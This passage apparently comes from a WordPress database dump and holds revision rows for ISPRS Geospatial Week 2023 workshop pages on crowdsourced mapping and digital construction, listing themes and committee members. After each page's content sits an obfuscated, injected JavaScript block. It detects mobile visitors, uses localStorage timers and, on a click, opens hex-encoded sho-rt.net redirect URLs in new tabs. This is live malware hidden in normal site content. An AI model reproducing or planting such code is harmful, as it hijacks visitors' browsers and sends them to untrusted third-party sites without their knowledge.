|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2023-02-05 13:51:00','2023-02-05 13:51:00','',2697,'https://gsw2023.com/?p=3813',0,'revision','',0),
(3814,1,'2023-02-05 13:55:57','2023-02-05 13:55:57','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Digital Construction</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2023-02-05 13:55:57','2023-02-05 13:55:57','',2712,'https://gsw2023.com/?p=3814',0,'revision','',0),
(3815,1,'2023-02-05 13:56:53','2023-02-05 13:56:53','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Digital Construction</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 